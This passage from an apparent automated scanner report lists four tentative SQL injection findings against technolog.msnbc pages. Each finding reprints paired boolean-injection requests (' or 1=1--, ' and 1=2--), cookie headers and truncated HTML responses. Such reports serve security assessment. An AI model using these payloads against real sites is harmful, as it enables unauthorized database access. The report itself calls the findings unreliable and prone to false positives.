                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /featured

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14912380'%20or%201%3d1--%20 and 14912380'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /featured?114912380'%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:39:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139058

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1733253576&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1733253576&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shoppin
...[SNIP]...

Request 2

GET /featured?114912380'%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139048

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=8133541&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=8133541&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a><
...[SNIP]...

1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /justin-bieber

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 68290612%20or%201%3d1--%20 and 68290612%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /justin-bieber?168290612%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135277

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=752376566&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=752376566&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

Request 2

GET /justin-bieber?168290612%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135287

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1280493596&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1280493596&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

1.90. http://technolog.msnbc.redacted/mark-zuckerberg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /mark-zuckerberg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 48291817'%20or%201%3d1--%20 and 48291817'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mark-zuckerberg48291817'%20or%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:03:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40348

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=941345266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=941345266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /mark-zuckerberg48291817'%20or%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:03:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40332

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=548714074&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=548714074&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.91. http://technolog.msnbc.redacted/xbox [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /xbox

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xbox'%20and%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:05:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40300

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=527795961&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=527795961&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /xbox'%20and%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40312

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=618466099&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
